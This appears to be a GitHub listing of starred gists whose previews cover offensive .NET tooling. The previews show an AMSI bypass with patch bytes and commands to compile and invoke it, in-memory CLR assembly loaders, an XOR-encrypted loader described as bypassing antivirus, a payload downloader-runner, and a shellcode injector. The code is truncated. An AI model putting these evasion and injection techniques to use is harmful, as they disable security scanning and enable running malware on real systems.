Skip to content

Instantly share code, notes, and snippets.

View decay88's full-sized avatar

decay88

140 followers · 389 following
View GitHub Profile
@FatRodzianko
FatRodzianko / my-dotnet-am-bypass.cs
Created August 23, 2020 19:42
AMSI bypass that modifies the bytes of the patch and then changes them in a for loop. ".\csc.exe -target:library -out:C:\Exclusions\my-dotnet-am-bypass.dll C:\Exclusions\my-dotnet-am-bypass.cs" "Add-Type -Path C:\Exclusions\my-dotnet-am-bypass.dll" "[Amsi]::Bypass()"
using System;
using System.Runtime.InteropServices;
public class Amsi
{
static byte[] patch = new byte[] { 0xBA, 0x59, 0x02, 0x09, 0x82, 0xC5 };
public static void Bypass()
@EgeBalci
EgeBalci / clr_via_native.c
Created August 6, 2020 05:16 — forked from xpn/clr_via_native.c
A quick example showing loading CLR via native code
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
@ropnop
ropnop / go-sharp-loader.go
Created August 5, 2020 17:12
Example Go file embedding multiple .NET executables
package main
/*
Example Go program with multiple .NET Binaries embedded
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
$ go get -u github.com/gobuffalo/packr/packr
Place all your EXEs are in a "binaries" folder
@Arno0x
Arno0x / NetLoader.cs
Last active October 12, 2023 23:19
Partial rewrite of @Flangvik NetLoader. Supports proxy with authentication, XOR encrypted binaries, multiple arguments passing to binary.
/*
Author: Arno0x0x, Twitter: @Arno0x0x
Completely based on @Flangvik netloader
This partial rewrite of @Flangvik Netloader includes the following changes:
- Allow loading of an XOR encrypted binary to bypass antiviruses
To encrypt the initial binary you can use my Python transformFile.py script.
Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor
@dr4k0nia
dr4k0nia / Homoglyph_Obfuscation.md
Last active October 28, 2022 16:55
Abusing homoglyphs in .NET "Obfuscation" (Write up)

Abusing homoglyphs in .NET "Obfuscation"

A while ago I watched a very interesting DEF CON talk called "Repsych: Psychological Warfare in Reverse Engineering" by Chris Domas. In his talk Chris talked about how one could fool and or piss off reverse engineers with some little tricks. This got me thinking what can I do in .net to piss off and or fool reverse engineers. After reading about homoglyphs I had a fun little idea.

What are homoglyphs?

Homoglyphs are characters that look the same but are actually from different alphabets. For our obfuscation concept, we will abuse the fact that there are unicode characters that look just like normal latin letters.

How can we use homoglyphs?

So since the homoglyph characters look just like latin characters, we can use them to have to identical looking names that are actually different. For example we could replace the character M in the name <Module> with an M from a different alphabet.

@mvelazc0
mvelazc0 / GetAndRunBlockDlls.cs
Last active October 12, 2020 23:45
Uses the Blockdlls technique to execute https://gist.github.com/mvelazc0/4a56e1829ef3bd2784b6f06e35cb0ff2 as a child process.
using System;
using System.IO;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace GetAndRunBlockDlls
{
class Program
@mvelazc0
mvelazc0 / GetAndRun.cs
Last active October 4, 2020 02:44
Downloads a XOR encrypted assembly payload (Payload.cs) and executes the "Run" method using .NET reflection
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Net;
using System.Reflection;
using System.Text;
namespace GetAndRun
{
@mvelazc0
mvelazc0 / InjectDonut.cs
Last active October 12, 2020 23:45
Leverages donut.exe (https://github.com/TheWover/donut) to generate position independant shellcode and injects it into a process using CreateRemoteThread. In this POC, notepad.exe
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
namespace InjectDonut
{
public class Program
{
@gavz
gavz / clr_via_native.c
Created March 16, 2020 13:47 — forked from xpn/clr_via_native.c
A quick example showing loading CLR via native code
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
@gavz
gavz / TestAssembly.cs
Created February 23, 2020 16:11 — forked from Arno0x/TestAssembly.cs
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace